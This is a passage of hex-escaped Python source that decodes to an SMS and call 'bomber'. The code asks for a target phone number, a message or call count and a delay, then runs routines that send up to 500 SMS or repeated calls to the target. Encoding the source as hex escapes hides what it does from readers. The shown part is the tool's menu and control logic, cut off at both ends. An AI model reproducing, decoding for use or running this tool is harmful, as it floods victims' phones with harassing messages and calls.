3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x4e\x6f\x2e\x6f\x66\x20\x4d\x65\x73\x73\x61\x67\x65\x73\x20\x54\x6f\x20\x53\x65\x6e\x64\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x66\x6c\x6f\x61\x74\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x46\x6f\x72\x20\x4d\x65\x73\x73\x61\x67\x65\x7b\x35\x7d\x28\x7b\x30\x7d\x69\x6e\x20\x73\x65\x63\x6f\x6e\x64\x73\x7b\x35\x7d\x29\x20\x7b\x33\x7d\x5b\x7b\x32\x7d\x52\x65\x63\x6f\x6d\x6d\x65\x6e\x64\x65\x64\x20\x35\x20\x73\x65\x63\x7b\x33\x7d\x5d\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x64\x6c\x20\x3c\x20\x35\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x43\x61\x6e\x27\x74\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4c\x65\x73\x73\x20\x54\x68\x65\x6e\x20\x35\x20\x53\x65\x63\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x35\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x73\x6d\x73\x5f\x77\x6f\x72\x6b\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x30\x7d\x5b\x7b\x35\x7d\x54\x41\x52\x47\x45\x54\x20\x44\x45\x54\x41\x49\x4c\x53\x7b\x30\x7d\x5d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x54\x61\x72\x67\x65\x74\x20\x4e\x75\x6d\x62\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x38\x7d\x3a\x7b\x34\x7d\x7b\x35\x7d\x20\x2b\x7b\x33\x7d\x7b\x36\x7d\x20\x7b\x37\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x73\x74\x72\x28\x63\x63\x29\x2c\x70\x6e\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x4e\x75\x6d\x62\x65\x72\x20\x6f\x66\x20\x4d\x65\x73\x73\x61\x67\x65\x20\x54\x6f\x20\x53\x65\x6e\x74\x20\x7b\x30\x7d\x7b\x37\x7d\x3a\x7b\x34\x7d\x20\x7b\x33\x7d\x7b\x36\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x6e\x6d\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x37\x7d\x3a\x7b\x34\x7d\x20\x7b\x33\x7d\x7b\x36\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x64\x6c\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x74\x5c\x74\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x7b\x36\x7d\x45\x6e\x74\x65\x72\x7b\x34\x7d\x20\x7b\x33\x7d\x54\x6f\x20\x43\x6f\x6e\x74\x69\x6e\x75\x65\x2e\x2e\x2e\x2e\x5c\x6e\x5c\x74\x5c\x74\x49\x66\x20\x59\x6f\x75\x20\x57\x61\x6e\x74\x20\x54\x6f\x20\x43\x68\x61\x6e\x67\x65\x20\x50\x72\x65\x73\x73\x20\x22\x7b\x36\x7d\x58\x7b\x34\x7d\x7b\x33\x7d\x22\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x5c\x74\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x58\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6f\x5f\x73\x6d\x73\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6d\x73\x5f\x73\x61\x76\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x0a\x64\x65\x66\x20\x6e\x6f\x5f\x63\x61\x6c\x6c\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x4e\x6f\x2e\x6f\x66\x20\x43\x61\x6c\x6c\x20\x54\x6f\x20\x4d\x61\x6b\x65\x7b\x35\x7d\x28\x7b\x33\x7d\x4d\x61\x78\x69\x6d\x75\x6d\x20\x32\x30\x7b\x35\x7d\x29\x20\x20\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x66\x6c\x6f\x61\x74\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x7b\x35\x7d\x28\x7b\x30\x7d\x69\x6e\x20\x73\x65\x63\x6f\x6e\x64\x73\x7b\x35\x7d\x29\x20\x7b\x33\x7d\x5b\x7b\x32\x7d\x52\x65\x63\x6f\x6d\x6d\x65\x6e\x64\x65\x64\x20\x31\x30\x20\x73\x65\x63\x7b\x33\x7d\x5d\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x64\x6c\x20\x3c\x20\x31\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x43\x61\x6e\x27\x74\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4c\x65\x73\x73\x20\x54\x68\x65\x6e\x20\x31\x30\x20\x53\x65\x63\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x31\x30\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x63\x61\x6c\x6c\x5f\x77\x6f\x72\x6b\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x30\x7d\x5b\x7b\x35\x7d\x54\x41\x52\x47\x45\x54\x20\x44\x45\x54\x41\x49\x4c\x53\x7b\x30\x7d\x5d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x54\x61\x72\x67\x65\x74\x20\x4e\x75\x6d\x62\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x38\x7d\x3a\x7b\x34\x7d\x7b\x35\x7d\x20\x2b\x7b\x33\x7d\x7b\x36\x7d\x20\x7b\x37\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x73\x74\x72\x28\x63\x63\x29\x2c\x70\x6e\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x4e\x75\x6d\x62\x65\x72\x20\x6f\x66\x20\x4d\x65\x73\x73\x61\x67\x65\x20\x54\x6f\x20\x53\x65\x6e\x74\x20\x7b\x30\x7d\x7b\x37\x7d\x3a\x7b\x34\x7d\x20\x7b\x33\x7d\x7b\x36\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x6e\x6d\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x37\x7d\x3a\x7b\x34\x7d\x20\x7b\x33\x7d\x7b\x36\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x64\x6c\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x74\x5c\x74\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x7b\x36\x7d\x45\x6e\x74\x65\x72\x7b\x34\x7d\x20\x7b\x33\x7d\x54\x6f\x20\x43\x6f\x6e\x74\x69\x6e\x75\x65\x2e\x2e\x2e\x2e\x5c\x6e\x5c\x74\x5c\x74\x49\x66\x20\x59\x6f\x75\x20\x57\x61\x6e\x74\x20\x54\x6f\x20\x43\x68\x61\x6e\x67\x65\x20\x50\x72\x65\x73\x73\x20\x22\x7b\x36\x7d\x58\x7b\x34\x7d\x7b\x33\x7d\x22\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x5c\x74\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x58\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6f\x5f\x63\x61\x6c\x6c\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x61\x6c\x6c\x5f\x73\x61\x76\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x64\x65\x66\x20\x73\x6d\x73\x5f\x77\x6f\x72\x6b\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x63\x63\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x70\x6e\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x69\x6e\x74\x28\x6e\x6d\x29\x0a\x20\x20\x20\x20\x6d\x61\x78\x6c\x69\x6d\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x69\x66\x20\x63\x63\x20\x3d\x3d\x20\x22\x39\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x78\x6c\x69\x6d\x20\x3d\x20\x35\x30\x30\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x78\x6c\x69\x6d\x20\x3d\x20\x31\x30\x30\x0a\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x20\x3e\x20\x6d\x61\x78\x6c\x69\x6d\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x57\x69\x6c\x6c\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4f\x6e\x6c\x79\x27\x20\x2b\x73\x74\x72\x28\x6d\x61\x78\x6c\x69\x6d\x29\x20\x2b\x20\x27\x20\x53\x4d\x53\x20\x41\x74\x20\x4f\x6e\x63\x65\x2e\x2e\x21\x5c\x6e\x27\x29\x0a\